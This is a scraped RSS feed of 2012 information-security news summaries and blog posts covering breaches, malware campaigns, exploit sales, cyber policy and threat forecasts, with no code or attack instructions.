==> Companies are losing control of their data to the mobile revolution

http://www.infosecurity-magazine.com/rss/news/ Users are sharing information on social networks and using public cloud services to move data from corporate to personal devices in ways that by-pass company security policies and systems, and expose company data.

==> Korean info-stealing malware targets Russian space, telecom targets

http://www.infosecurity-magazine.com/rss/news/ A new targeted information-stealing attack toward Russian entities has been found in the malware landscape. Dubbed "Sanny", it apparently originates from Korea.

==> New ransomware holds medical records with hostile encryption

http://www.infosecurity-magazine.com/rss/news/ Russian hackers may be behind a new effort that is holding an Australian medical clinic's patient records for ransom. A drive with sensitive information has been hijacked and forcibly encrypted and the attackers are demanding the oddly low price of around $4,200 to make the data available again.

==> Entry-level firewalls fall down on the job when faced with threats, volume

http://www.infosecurity-magazine.com/rss/news/ New research shows that basic firewall functionality tends meet key performance thresholds, but there is a level of compromise with entry-level products involved in terms of performance when advanced functionality is enabled or when the threat level surpasses a certain threshold.

==> Audio surveillance being installed on US buses

http://www.infosecurity-magazine.com/rss/news/ Concern over video and now audio recording of driver and passenger conversations on US public buses has been growing for some time. According to a report in The Daily, audio installation in transit systems, sometimes funded by the DHS, is on the increase across America.

==> 1.6 million records hacked and dumped by GhostShell

http://www.infosecurity-magazine.com/rss/news/ Hacking group Team GhostShell launches a new logo, drops 1.6 million hacked records in the name of ProjectWhiteFox (NASA, European Space Agency, Bigelow Aerospace and more), and signs off until the new year.

==> Communications Bill is overkill says parliamentary committee

http://www.infosecurity-magazine.com/rss/news/ The Joint Committee on the Draft Communications Data Bill has today published its recommendations on the UK governments draft Communications Bill: stop, rethink, engage in proper consultation and redraft for just what is necessary.

==> Kaspersky: 2012 saw billions of new attacks, especially Mac, Android

http://www.infosecurity-magazine.com/rss/news/ Web-based attacks are growing exponentially, according to Kaspersky Lab, which said that a surge in web attacks lately has resulted in it blocking more than 1.5 billion attacks and 3 billion infected files in 2012. The security firm said that it now detects 200,000 new malicious programs every day.

==> Wii U gets Homebrew hack

http://www.infosecurity-magazine.com/rss/news/ Ninetendo is betting big for the holidays with the new Wii U gaming console, a connected living room hub affair that, like the Xbox 360, aims to stake out a place in the home that goes far beyond simple gaming, by offering various online video options, video chat service and more. Now, hackers have retrofitted the Wii Homebrew Channel with an update allowing it to function on the Wii Uwith potential consequences for piracy.

==> Google's built-in Android app scanner fails 85% of the time

http://www.infosecurity-magazine.com/rss/news/ Android continues to be the top target for mobile malwarean issue that Google is taking steps to remedy.

==> Shamoon was an external attack on Saudi oil production

http://www.infosecurity-magazine.com/rss/news/ In its first comment on the apparent purpose behind the August Shamoon attack on Aramco, Saudi Arabia said Sunday that it was an external attack not just against Aramco, but against the Saudi economy.

==> Barrett Brown indicted for trafficking in credit card numbers

http://www.infosecurity-magazine.com/rss/news/ On 4 December a new indictment against Barrett Brown, the one-time self-proclaimed spokesman for Anonymous, says that he did knowingly traffic in more than five authentication features knowing that such features were stolen and produced without lawful authority.

==> GPU cluster can crack any NTLM 8-character hashed password in 5.5 hours

http://www.infosecurity-magazine.com/rss/news/ A cluster of 25 AMD Radeon GPUs using OpenVCL and the Hashcat password recovery software is claimed to make 348 billion guesses per second against NTLM hashed passwords, and 63 billion against SHA1 hashed passwords according to a presentation at last weeks Passwords^12 conference in Oslo.

==> Escalating healthcare data breaches come with $7bn pricetag

http://www.infosecurity-magazine.com/rss/news/ Healthcare data breaches, despite their high profile in the news, arent getting any rarer: in fact, lost or stolen devices and employee errors are heading towards a $7 billion price tag for the industry more than the level of funding that the US government gives cancer research.

==> Cyber-attacks that kill, IPv6, and vulnerability markets on tap for 2013

http://www.infosecurity-magazine.com/rss/news/ As rough of a year as 2012 was for cybersecurity, in 2013 we will see higher stakes than ever before, researchers say. WatchGuard's security research analysts are predicting upticks in emerging cyber threats including those that can cause loss of human life.

==> Goodbye, 123456: Blackberry bans weak passwords

http://www.infosecurity-magazine.com/rss/news/ Blackberry has always had a reputation for taking particular care when it comes to security. Its enterprise-server-based deployment configuration was one of the reasons the Blackberry soared to such a high penetration rate in North America, pre-iPhone. Now, Blackberry-maker Research in Motion is tackling the consumer side of things, banning 106 passwords from being used with its devices because they are too weak.

==> New and improved SHA1 cracking method for passwords published

http://www.infosecurity-magazine.com/rss/news/ SHA1 is probably the most widely used password cryptographic hash function; but perhaps it shouldnt be. The first attack faster than brute force against SHA1 was discovered in 2005, and just over two months ago NIST declared, Federal agencies should stop using SHA-1...

==> More than half of IT departments don't bother with cloud vendor vetting

http://www.infosecurity-magazine.com/rss/news/ Even though the cloud and cybersecurity is at the top of the list when it comes to CIO concerns (84% of them say they are concerned about IT security breaches), less than half (45%) of companies recently surveyed said that they actually test their cloud vendors' security systems and procedures.

==> October’s Nationwide breach exposed 1.1 million Americans

http://www.infosecurity-magazine.com/rss/news/ News of a breach at Nationwide began to appear in November when it wrote to affected customers. Compromised information includes social security numbers, driving license numbers, date of birth and other information valuable to social engineering; but apparently no bank card or medical information.

==> Kim Dotcom wins another round in his battle against extradition

http://www.infosecurity-magazine.com/rss/news/ Kim Dotcom was arrested, and Megaupload seized just under a year ago. Since then Dotcom has been fighting extradition to the United States, while the New Zealand authorities have repeatedly bungled the case against him.

==> December 2012 Patch Tuesday preview

http://www.infosecurity-magazine.com/rss/news/ Next weeks Patch Tuesday, the last of 2012, comprises seven security bulletins. Five are critical, two are important. Five require restarts, two may require a restart.

==> Cyber-spying, hacktivism and the public sector raise the threat level for 2013

http://www.infosecurity-magazine.com/rss/news/ As a companion guide to its retrospective of the security lowlights of 2012, Kaspersky Lab has taken its turn peering into the crystal ball to see whats ahead for 2013. The researchers also see the cloud, Mac malware, Android and exploits/vulnerabilities as trends to watch in 2013.

==> Malware set to take a big bite out of Apple in 2013

http://www.infosecurity-magazine.com/rss/news/ As Macs and other Apple devices move from the purview of the creative and CxO arenas into a more entrenched home in the enterprise, SophosLabs expects malware developers to reallocate their resources accordingly.

==> Eurograbber – banks must try harder

http://www.infosecurity-magazine.com/rss/news/ After news of the Eurograbber bank fraud malware campaign broke yesterday, the autopsy on what went wrong has begun. The general consensus is that the banks must do more to protect their customers.

==> WCIT: national governments’ control over the internet may be a side-effect

http://www.infosecurity-magazine.com/rss/news/ WCIT is now in process in Dubai. Its lack of transparency means that the world has had little but conjecture over its purpose and that conjecture has largely focused on a predicted grab for control of the internet on behalf of the UN.

==> Zeus malware throws €36+ million lightning bolt across Europe

http://www.infosecurity-magazine.com/rss/news/ A highly sophisticated, multi-pronged cybercriminal attack used to steal an estimated 36+ million from more than 30,000 bank accounts across Europe has been uncovered. The attack uses a new, souped-up form of the Zeus trojan.

==> 2012: The Year Malware Went Nuclear

http://www.infosecurity-magazine.com/rss/news/ Kaspersky Lab has broken down the top security stories of 2012, and the list is certainly filled full of doozies. The Mac OS X Flashback epidemic, cyber-espionage, the Android mobile malware explosion and Java zero-days are but a few of the greatest hits, or worst hits, as it were, of the year.

==> SMBs beware: Researchers uncover cloud browser vulnerability

http://www.infosecurity-magazine.com/rss/news/ Researchers from North Carolina State University and the University of Oregon have found a way to use a technique called MapReduce to exploit cloud-based web browsers, which execute JavaScript code for mobile clients.

==> Skills and security are the biggest barriers to successful business

http://www.infosecurity-magazine.com/rss/news/ The annual IBM Tech Report highlights four new technologies that are changing the face of IT: mobile technology, business analytics, cloud computing and social business all of them suffering a severe skill shortage.

==> Little-understood bleep ID theft reaching crisis level

http://www.infosecurity-magazine.com/rss/news/ While identity theft is a well-known and well-feared issue, the mainstream concern tends to revolve around the theft of financial data, or the use of social security numbers and other sensitive information to set up bogus accounts i.e., issues that grown-ups have. It turns out, however, that bleep are increasingly in the sites of criminals bent on perpetrating a range of fraud stemming from the creation of synthetic identities.

==> John McAfee turns up in Guatemala following manhunt

http://www.infosecurity-magazine.com/rss/news/ Security pioneer John McAfee, who started the powerhouse software company that still bears his name, is at the center of an international manhunt that is reminiscent of the Wheres Waldo childrens books. He has now fled to Guatemala.

==> Swiss intelligence agency loses terabytes of data to an insider

http://www.infosecurity-magazine.com/rss/news/ An IT technician working for the Swiss intelligence agency NDB simply downloaded and walked out with terabytes of data the equivalent of thousands or even millions of printed pages.

==> O2 Ireland loses back-up tape with unknown, unencrypted data

http://www.infosecurity-magazine.com/rss/news/ O2 Ireland, part of the Spanish telecommunications company Telefnica Europe, has admitted the loss of a backup tape. The loss happened in September 2011, O2 learned about it in the summer 2012, and is now telling its customers.

==> Dalai Lama website hack spreads new Mac malware

http://www.infosecurity-magazine.com/rss/news/ The security personnel in charge of one of the Dalai Lamas English-language websites are likely tapping their Zen reserves in the face of a new hack that is pushing a new form of Mac malware to unwitting visitors.

==> Minister describes progress on the UK Cyber Security Strategy

http://www.infosecurity-magazine.com/rss/news/ Francis Maude, UK Minister for the Cabinet Office and Paymaster General and the minister responsible for the cybersecurity strategy has delivered what is likely to be the first annual update on progress so far.

==> Mass phishing will be replaced by spear-phishing in 2013

http://www.infosecurity-magazine.com/rss/news/ The traditional mass phishing campaign of the past will slowly be replaced by more targeted and effective personalized spear-phishing in the future.

==> Sophos analyzes 2012, and predicts 2013 threats

http://www.infosecurity-magazine.com/rss/news/ The battle against the bad guys is continually evolving, with new attacks generating new defenses leading to new attacks. The Sophos 2013 Threat Report evaluates the experience of 2012 and predicts the evolution of threats for 2013.

==> Cyber trolls hack Tumblr

http://www.infosecurity-magazine.com/rss/news/ Cyber-troll group GNAA has claimed responsibility for compromising about 8,600 Tumblr accounts in a campaign that may be in response to the recent guilty verdict for Andrew Auernheimer in an iPad hacking case.

==> The final frontier: space-related threats blast off

http://www.infosecurity-magazine.com/rss/news/ Space is proving itself to be the final frontier not just in manned exploration, but also when it comes to security. According to security researchers, threats to various space agency equipment are advancing at warp speed.

==> Mobile, APTs and apps top IT security concerns for 2013

http://www.infosecurity-magazine.com/rss/news/ As they take stock of their endpoint vulnerability moving into 2013, IT departments are dealing with the flood of mobile devices entering their corporate networks, advanced persistent threats and third-party application vulnerabilities as their primary pain points, driving the need for new security approaches.

==> Phone users worry about security, but won’t pay for it

http://www.infosecurity-magazine.com/rss/news/ A survey of more than 1000 UK mobile phone users shows that while they are concerned about the security of their phones, they believe that they already pay enough; and they will hold providers liable for any loss of security.

==> Acer India hacked by Maxney; 15,000 user details leaked

http://www.infosecurity-magazine.com/rss/news/ It was announced on Sunday that the Acer India website has been hacked over the weekend, and a 41 Mb file was stolen and published on RapidShare.

==> Business disagrees with government on EU Data Protection Regulation

http://www.infosecurity-magazine.com/rss/news/ The first Ministry of Justice advisory panel discussion on the EUs Data Protection Regulation suggests a divergence between government and UK industry, with attendees feeling it should reduce the burden on business overall.

==> Connecticut university opens up 235,000 SSNs to hackers

http://www.infosecurity-magazine.com/rss/news/ Western Connecticut State University has disclosed a security breach that may have exposed names, addresses, financial information and Social Security Numbers of nearly 235,000 people over a three-year period.

==> EMV global payment standard will drastically reduce credit-card fraud in the US

http://www.infosecurity-magazine.com/rss/news/ With the Europay, MasterCard and Visa (EMV) global standard for credit and debit cards poised to be adopted in the US (there is an April 2013 migration deadline), analysts at Frost & Sullivan say that credit card payments will become much more secure. Almost half of the worlds credit card fraud last year (46%) took place in the US, where the easily compromised magnetic stripe still rules the day.

==> Hacktivist group targets Syria in wake of internet blackout

http://www.infosecurity-magazine.com/rss/news/ Global hacktivist collective Anonymous is targeting Syrian websites worldwide to protest an internet blackout in that country, which was instituted Thursday in what most think is an attempt by President Bashar al-Assad to cut off communication routes for the opposition.

==> Clickjacking threatens two-thirds of top 20 banking sites

http://www.infosecurity-magazine.com/rss/news/ Almost a two-thirds of the top banking sites, one-fifth of popular open-source web app sites and a full 70% of the top 10 websites by number of visitors have absolutely no countermeasures against clickjacking attacks, even if they require a secure environment, such as banks providing online banking services.

==> Shylock malware evolves to evade security lab environments

http://www.infosecurity-magazine.com/rss/news/ Just as biological viruses constantly evolve to avoid being eradicated by the bodys immune defenses, so too do cyberbugs. The Shylock malware has done just that, developing the ability to identify and avoid remote desktop environments which are used by researchers to identify analyze security threats.

==> Anti-virus vendors warn users to beware of the ChangeUp worm

http://www.infosecurity-magazine.com/rss/news/ ChangeUp is the Symantec name for the worm known as W32/VBNA-X by Sophos and W32/Autorun.worm.aaeb by McAfee. All three companies are warning their users about an increase in detections over the last few days.

==> BPI demands UK Pirate Party shut down its Pirate Bay proxy

http://www.infosecurity-magazine.com/rss/news/ The British Phonographic Industry (BPI) has written to the UK Pirate Party, a democratic political party, and demanded that it close the proxy service it provides to allow users to bypass the ISP block on The Pirate Bay.

==> ICO fines Tetrus owners £440,000

http://www.infosecurity-magazine.com/rss/news/ The UK Information Commissioners Office has issued monetary penalties against Christopher Niebel (300,000) and Gary McNeish (140,000) for sending millions of unsolicited spam texts offering accident and PPI compensation services to mobile phone users.

==> Hewlett Packard’s Autonomy woes deepen

http://www.infosecurity-magazine.com/rss/news/ On Tuesday a new shareholder lawsuit claimed audit firms Deloitte and KPMG missed red flags about Autonomys accounting, and also named HP's board of directors, officers, and former executives alleging breach of duty and negligence.

==> Report tests browser ability to filter malicious URLs

http://www.infosecurity-magazine.com/rss/news/ NSS Labs has published the second of its two analyses on the security capabilities of the four leading browsers. The first report was on the ability of browsers to block malware; this second is on browsers ability to filter malicious URLs.

==> Amelia Andersdotter describes the gulf between industry, government and people

http://www.infosecurity-magazine.com/rss/news/ ENISA the European Network and Information Security Agency held a high-level event at the Bedford hotel in Brussels on Tuesday. The subject was EU Cyber Cooperation, and the intent was to discuss shared responsibility.

==> FBI explores $150,000 payroll hack at Wisconsin school

http://www.infosecurity-magazine.com/rss/news/ Imagine: its the day after Thanksgiving, and while most people are contemplating what bread to use with their turkey sandwiches for lunch, others are contemplating the best way to rip off a large sum of money from the unsuspecting.

==> Crystal ball time: Top 2013 risks include cyber war, cloud and BYOD

http://www.infosecurity-magazine.com/rss/news/ As the year draws inexorably to a close, its only fair and natural that we, as an industry, peer into the future to see what could await us in the New Year. The latest to tackle such prognostication is the Information Security Forum (ISF), which has IDd the top five security threats businesses will face in 2013.

==> UK, European politicians pledge support to online bleep bleep abuse hotline

http://www.infosecurity-magazine.com/rss/news/ More than 50 politicians from England, Wales, Scotland, Northern Ireland and continental Europe have signed up to fight online bleep bleep abuse with the Internet Watch Foundation.

==> 91% of APT attacks start with a spear-phishing email...

http://www.infosecurity-magazine.com/rss/news/ ...and 94% of the emails carry a malicious attachment usually in ZIP, XLS or RTF format. These are the findings of new research published today.

==> AV ‘provides insufficient protection’ claims new report

http://www.infosecurity-magazine.com/rss/news/ The rate of detection for new viruses, claims a new report that tested 80 of them and is about to be published, is zero.

==> LulzSec hacker Hammond faces 30 years

http://www.infosecurity-magazine.com/rss/news/ At a bail hearing last week, Chief U.S. District Judge Loretta Preska denied bail and warned LulzSecs Hammond that he faces a custodial sentence of 30 years.

==> Critical infrastructure at risk from SCADA vulnerabilities

http://www.infosecurity-magazine.com/rss/news/ SCADA software, used for industrial control mechanisms in utilities, airports, nuclear facilities, manufacturing plants and the like, is increasingly a target for hackers looking to exploit what appear to be growing numbers of vulnerabilities giving rise to fears that critical infrastructure may be at risk.

==> Yahoo! mail exploit on sale for $700

http://www.infosecurity-magazine.com/rss/news/ A new zero-day vulnerability in Yahoo! Mail has given rise to a $700 exploit for sale in the hacking underground.

==> UN nuclear agency compromised by anti-Israel hacktivists

http://www.infosecurity-magazine.com/rss/news/ Another Middle East-focused cyber-attack has been launched, but its a piece of news that would not be out of place in the Cold War era: the International Atomic Energy Agency has been hacked. Information from an out-of-use server has been stolen and posted online.

==> The salami apocalypse – big data in the wrong hands

http://www.infosecurity-magazine.com/rss/news/ The world is not facing a Mayan calendar doomsday next month so much as a salami apocalypse next year: threats built layer upon layer from small bits of information that can be combined into detailed personal profiles.

==> Privacy advocates ask Facebook to withdraw proposed policy changes

http://www.infosecurity-magazine.com/rss/news/ A letter signed by Marc Rotenberg, president at the Electronic Privacy Information Center and Jeffrey Chester, president at the Center for Digital Democracy, has asked Mark Zuckerberg to withdraw the newly announced changes to Facebooks Data Use Policy.

==> Europol and ICE seize 132 domain names on Cyber Monday

http://www.infosecurity-magazine.com/rss/news/ The US Operation In Our Sights temporarily morphed into Project Cyber Monday 3 with a European Project Transatlantic offshoot and netted a combined haul of 132 seized counterfeiting website domains.

==> High-end Citadel financial malware overtakes Zeus as king

http://www.infosecurity-magazine.com/rss/news/ Citadel, which researchers say is essentially the Lamborghini of the financial information-stealing malware scene, is well on its way to overtaking Zeus and SpyEye as the go-to banking trojan after only being discovered earlier this month.

==> Go Daddy DNS hack spreads ransomware

http://www.infosecurity-magazine.com/rss/news/ Go Daddy, the worlds largest internet domain host and registrar, may soon be known for more than those racy Super Bowl ads featuring Danica Patrick: ransomware is being spread across its footprint.

==> Spam volume hits year-long low, but remains just as dangerous

http://www.infosecurity-magazine.com/rss/news/ Global spam and phishing attacks decreased notably in October, reaching the years lowest level of volume despite a rich mine of topics to leverage, like the presidential election in the US, Halloween and the advancing holiday shopping season. Also, a new hotel booking scam started making the rounds.

==> Round-up of Cyber Monday safe shopping tips

http://www.infosecurity-magazine.com/rss/news/ Cyber Monday is the first Monday following the US Thanksgiving. It is a successfully marketing-manufactured online shopping bonanza that is one of the biggest e-commerce days of the year and effectively the start of online Christmas shopping.

==> Targeted malware attacks SQL databases

http://www.infosecurity-magazine.com/rss/news/ W32.Narilam, primarily active in Iran, seems designed to attack business databases of corporations especially those related to ordering, accounting and customer relations. It doesnt steal data, it destroys data.

==> European Parliament passes a resolution condemning any internet takeover by the ITU

http://www.infosecurity-magazine.com/rss/news/ It is widely believed that next months ITU conference in Dubai (WCIT-12) will include an attempt by the International Telecommunication Union an agency of the United Nations to assume effective control of the internet.

==> Facebook changes its Data Use Policy and scraps user voting

http://www.infosecurity-magazine.com/rss/news/ In an email apparently being sent to its billion users, Facebook has detailed changes to its data usage policy together with an amendment to its future governance process causing many users to think they were being spammed or phished.

==> OFCOM suggests ISPs must decide who is a subscriber in relation to 3-strikes

http://www.infosecurity-magazine.com/rss/news/ Just as the US voluntary six-strike infringement code is about to begin, the UKs statutory three-strike regime inches closer with an OFCOM study into piracy and guidance on what constitutes a subscriber.

==> UN accused of planning to grab control of the internet in December

http://www.infosecurity-magazine.com/rss/news/ In just over a weeks time (3 December) the World Conference on International Telecommunications (WCIT-12) will begin in Dubai; and it stands accused of planning a clandestine UN takeover of the internet.

==> Greek man arrested over theft of 9 million personal data details

http://www.infosecurity-magazine.com/rss/news/ While European eyes are focused on the increasing political unrest in Greece, it has taken US reporters to notice a small detail: a Greek man has been arrested on suspicion of stealing 9 million personal data files.

==> Half of UK internet users have no idea whether accessed content, software is legal

http://www.infosecurity-magazine.com/rss/news/ Just around half of internet users in the UK (48%) have no clue whether the online content theyre accessing is illegal or not, a study has revealed. A full quarter (26%) said they would be more diligent about avoiding piracy if it were clearer what is legal and what isnt.

==> US Flames France – allegedly

http://www.infosecurity-magazine.com/rss/news/ French news site LExpress has accused the US of standing behind the infection of computers in the lyse Palace with Flame-like malware during the last days of Sarkozys presidency in May 2012.

==> ISF finds post-incident review sorely lacking in IT security departments

http://www.infosecurity-magazine.com/rss/news/ As IT departments continue to struggle with security effort prioritization, the Information Security Forum has launched the You Could Be Next report, which helps organizations to include post-incident review across three stages: impact assessment, root cause analysis and recommendations.

==> (ISC)² looks to address security expertise gap with 2013 scholarships

http://www.infosecurity-magazine.com/rss/news/ Its no secret that with the ever-rising tide of cyber threats there comes a need for additional security expertise to adequately combat the scope of attacks. Many IT departments suffer from a human capital resource issue, and its not always funding-related.

==> Andrew Auernheimer (aka weev) guilty of identity fraud and conspiracy to access a computer

http://www.infosecurity-magazine.com/rss/news/ A Newark, New Jersey, jury yesterday took just a couple of hours to return a guilty verdict on two counts against grey hat hacker Andrew Auernheimer for his action against AT&T and early adopters of the Apple iPad in 2010.

==> New Linux rootkit delivering drive-by infections discovered

http://www.infosecurity-magazine.com/rss/news/ Eight days ago an anonymous victim posted details of a new Linux rootkit to the Full Disclosure mailing list, asking for information. The rootkit was adding an iFrame into HTTP responses returned by the victims web server.

==> Firefox 17 comes with security fixes and improvements – and social enhancement

http://www.infosecurity-magazine.com/rss/news/ Firefox 17 FINAL (the latest stable version) has been released with thousands of bug fixes, 16 security fixes, Facebook integration, and a click-to-play blocklist plug-in security feature and Mozilla drops support for OSX Leopard (10.5).

==> Quantum cryptography for all takes a giant leap closer

http://www.infosecurity-magazine.com/rss/news/ Toshiba Research Europe, working with the Cambridge University Engineering Lab, has today announced a breakthrough in quantum cryptography; bringing the potential for secure communications for everyone closer to reality.

==> Problems with the EU’s proposed ‘right to be forgotten’

http://www.infosecurity-magazine.com/rss/news/ The EUs proposed Data Protection Regulation includes a difficult concept known as the right to be forgotten. It proposes that individuals should be able to remove personal data that they no longer wish to be public but it is fraught with difficulties. ENISA has produced a report on these difficulties.

==> INSIDE Secure buys Apple’s left-overs

http://www.infosecurity-magazine.com/rss/news/ In July Apple announced its intention to acquire security firm AuthenTec. This deal was completed on 4 October. Yesterday, French security firm INSIDE Secure announced its intention to acquire ESS. ESS is owned by AuthenTec.

==> IRISSCERT Warns Irish Businesses Under Increasing Threat of Cybercrime

http://www.infosecurity-magazine.com/rss/news/ IRISSCERT is to hold its fourth annual cybercrime conference this coming Thursday the 22nd of November. As part of its conference IRISSCERT will reveal its second annual cybercrime statistics report. Based on the security incidents reported to it so far in 2012 IRISSCERT will highlight key trends and issues that businesses in Ireland should be aware of.

==> Blackhole exploits a major problem in October

http://www.infosecurity-magazine.com/rss/news/ GFI Softwares monthly malware analysis highlights the Blackhole exploit kit as a major problem during October, with specific campaigns linked to Windows 8, Facebook verifications, and Skype.

==> The legal implications of botnet disruptions

http://www.infosecurity-magazine.com/rss/news/ The best defense against a botnet is to get rid of it to infiltrate it, to learn all about it, and to take it down. While the takedown is usually done by or with law enforcement and any necessary court orders, the initial infiltration, often by individual security researchers or anti-malware vendors, remains a legally grey area.

==> FreeBSD shuts down servers after breach

http://www.infosecurity-magazine.com/rss/news/ Two servers belonging to the FreeBSD linux project were shut down at the beginning of last week following discovery of an SSH breach. The base operating system, maintained on separate servers, was not affected.

==> Top federal security execs join (ISC)²'s Government Advisory Board

http://www.infosecurity-magazine.com/rss/news/ Members of the Securities & Exchange Commission (SEC), the US Department of Health and Human Services and the US Department of Homeland Security (DHS) have joined the (ISC) US Government Advisory Board for Cyber Security.

==> Hacktivist group Anonymous rallies to Gaza's side with #OpIsrael offensive

http://www.infosecurity-magazine.com/rss/news/ Hacktivist collective Anonymous has a new target: Israeli websites. The group has launched the #OpIsrael offensive via Twitter in response to Israels military dispute with Gaza this week.

==> Proof-of-concept malware takes over USB smartcards

http://www.infosecurity-magazine.com/rss/news/ As if malware werent becoming pervasive already, a new proof-of-concept has been developed by a team of researchers that takes over smart cards plugged into an infected computers USB port, putting them and all of the information contained on them in the hands of potential cybercriminals.

==> EDPS delivers Opinion on the EC’s ‘cloud’ communication

http://www.infosecurity-magazine.com/rss/news/ In September, the European Commission issued its Unleashing the Potential of Cloud Computing in Europe Communication. Today, on his own initiative, the European Data Protection Supervisor (EDPS) has published his Opinion on the privacy implications.

==> ENISA and the privacy considerations of online behavioral tracking

http://www.infosecurity-magazine.com/rss/news/ With advertisers still claiming that do not track will destroy the free internet, and a European Commission proposal for privacy-by-design and by default enforced by sanctions ENISA has published a technical perspective on behavioral tracking.

==> Opera users urged to check for malware

http://www.infosecurity-magazine.com/rss/news/ Browsers come ready-configured with their own start-up home page; but the default Opera home page (portal.opera.com) was compromised with an obfuscated redirect leading to the blackhole exploit kit.

==> Hacking-as-a-service offers access to Fortune 500 servers for a few bucks

http://www.infosecurity-magazine.com/rss/news/ Call it a hacking-as-a-service (HaaS): a group renting network server access for a variety of Fortune 500 companies, including Cisco Systems, is taking advantage of weak passwords to offer logins for cheap. Despite its discovery three weeks ago, the service still appears to be going strong, at last count renting access to nearly 17,000 computers worldwide.

==> A Closer Look at Two Bigtime Botmasters

http://www.krebsonsecurity.com/feed/ Over the past 18 months, I've published a series of posts that provide clues about the possible real-life identities of the men responsible for building some of the largest and most disruptive spam botnets on the planet. I've since done a bit more digging into the backgrounds of the individuals thought to be responsible for the Rustock and Waledac spam botnets, which has produced some additional fascinating and corroborating details about these two characters.

==> Espionage Attacks Against Ruskies?

http://www.krebsonsecurity.com/feed/ Hardly a week goes by without news of a cyber espionage attack emanating from China that is focused on extracting sensitive data from corporations and research centers in the United States. But analysis of a recent malware campaign suggests that cyberspies in that region may be just as interested in siphoning secrets from Russian targets.

==> ATM Thieves Swap Security Camera for Keyboard

http://www.krebsonsecurity.com/feed/ This blog has featured stories about a vast array of impressive, high-tech devices used to steal money from automated teller machines (ATMs). But every so often thieves think up an innovation that makes all of the current ATM skimmers look like bleep's play. Case in point: Authorities in Brazil have arrested a man who allegedly stole more than USD $41,000 from an ATM after swapping its security camera with a portable keyboard that let him hack the cash machine.

==> Vrublevsky Sues Kaspersky

http://www.krebsonsecurity.com/feed/ The co-founder and owner of ChronoPay, one of Russia's largest e-payment providers, is suing Russian security firm Kaspersky Lab, alleging that the latter published defamatory blog posts about him in connection with his ongoing cybercrime trial.

==> Online Service Offers Bank Robbers for Hire

http://www.krebsonsecurity.com/feed/ An online service boldly advertised in the cyber underground lets miscreants hire accomplices in several major U.S. cities to help empty bank accounts, steal tax refunds and intercept fraudulent purchases of high-dollar merchandise.

==> All Banks Should Display A Warning Like This

http://www.krebsonsecurity.com/feed/ One of my Twitter account followers whose tweets I also follow -- @spacerog -- shared with me the following image, which he recently snapped with his phone while waiting in line at the Philadelphia Federal Credit Union. It's an excellent public awareness campaign, and one that I'd like to see replicated at bank branches throughout the country.

==> Java Zero-Day Exploit on Sale for ‘Five Digits’

http://www.krebsonsecurity.com/feed/ Miscreants in the cyber underground are selling an exploit for a previously undocumented security hole in Oracle's Java software that attackers can use to remotely seize control over systems running the program, KrebsOnSecurity has learned.

==> Yahoo Email-Stealing Exploit Fetches $700

http://www.krebsonsecurity.com/feed/ A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo! email accounts and redirect users to malicious Web sites offers a fascinating glimpse into the underground market for large-scale exploits. The exploit, being sold for $700 by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site scripting” (XSS) weakness in yahoo.com that lets [...]

==> Beware Card- and Cash-Trapping at the ATM

http://www.krebsonsecurity.com/feed/ Many security-savvy readers of this blog have learned to be vigilant against ATM card skimmers and hidden devices that can record you entering your PIN at the cash machine. But experts say an increasing form of ATM fraud involves the use of simple devices capable of snatching cash and ATM cards from unsuspected users.

==> New Search System, No More Accounts Needed [1]

http://www.offensivecomputing.net/?q=node/feed The new search system with the updated authentication system is online. There is still some missing functionality but it should let everyone download samples. If you find any problems please let me know. There will be some quirks as we move to the new version of the website. If you find any bugs please let me know on Twitter @openmalware. Danny [1] You still need a Google account to download the samples

==> State of Offensive Computing

http://www.offensivecomputing.net/?q=node/feed I would like to take this time to thank everyone that expressed their support while Offensive Computing was offline. It was a trying time and I really appreciate everyone's support. Without getting into any of the specifics of why the site was offline for two months, we are back and here to stay. There are a couple of people who were instrumental in helping to keep everything up and running. Paul Royal, from the Georgia Tech Information Security Center helped out significantly with hardware and the new home of the site. Kelcey Tietjen also stepped in and helped out tremendously. If you see either of them at some upcoming conferences (hint: Paul is giving a talk at Blackhat) buy them a drink. There are a couple of changes that are going to happen that more accurately reflect the intentions of the site. First, the name will be changing to Open Malware. The new name more accurately reflects the purpose and intention of the site. Way back in 2005 the intention was to make this a place where you could find information related to malware and other types of hacking. As things (and life) have progressed it has changed into a malware research site, specifically with the ability to download malware samples. The domain will be OpenMalware.org in the very near future. The second big item of news is that we will be transitioning to a download-only malware repository in the coming weeks. The blog site will be officially shutting down. There are much better forums maintained by commercial services that have taken up the role of a discussion area. Specifically the /r/ReverseEngineering and /r/Malware sub-Reddits, and OpenRCE are better avenues of communication. I will maintain a static version of the site to archive the old content. To accommodate the new download site, there will be a couple of changes. First, a lot of the back end software has changed. Searches will be faster, more malware will be available, and the overall maintenance will be a lot easier. Second, you will need to have a valid, verified Google Account. Having a Google account allows us to use industry standard authentication, and most importantly not to have to maintain a user database. Get one here if you haven't already. In the meantime new account creation is disabled while we make the transition. Old accounts should work as normal. Finally, we are discontinuing our commercial services. I would like to thank all of our customers for their business. You all helped to support this site and maintain an open service. We will be looking at transitioning to a non-profit status in the coming years. Thanks again, Danny Quist

==> VizSec 2012 Call for Papers Out

http://www.offensivecomputing.net/?q=node/feed VizSec 2012 will be held in mid-October as part of VisWeek in Seattle. Papers are due July 1. The International Symposium on Visualization for Cyber Security (VizSec) is a forum that brings together researchers and practitioners from academia, government, and industry to address the needs of the cyber security community through new and insightful visualization techniques. Co-located this year with VisWeek, the 9th VizSec will provide new opportunities for the usability and visualization communities to collaborate and share insights on a broad range of security-related topics. Accepted papers will appear in the ACM Digital Library as part of the ACM International Conference Proceedings Series. Important research problems often lie at the intersection of disparate domains. Our focus is to explore effective, scalable visual interfaces for security domains, where visualization may provide a distinct benefit, including computer forensics, reverse engineering, insider threat detection, cryptography, privacy, preventing 'user assisted' attacks, compliance management, wireless security, secure coding, and penetration testing in addition to traditional network security. Human time and attention are precious resources. We are particularly interested in visualization and interaction techniques that effectively capture human analyst insights so that further processing may be handled by machines, freeing the analyst for other tasks. For example, a malware analyst might use a visualization system to analyze a new piece of malicious software and then facilitate generating a signature for future machine processing. When appropriate, research that incorporates multiple data sources, such as network packet captures, firewall rule sets and logs, DNS logs, web server logs, and/or intrusion detection system logs, is particularly desirable. More information is on the web site: http://www.ornl.gov/sci/vizsec

==> Scalable, Automated Baremetal Malware Analysis

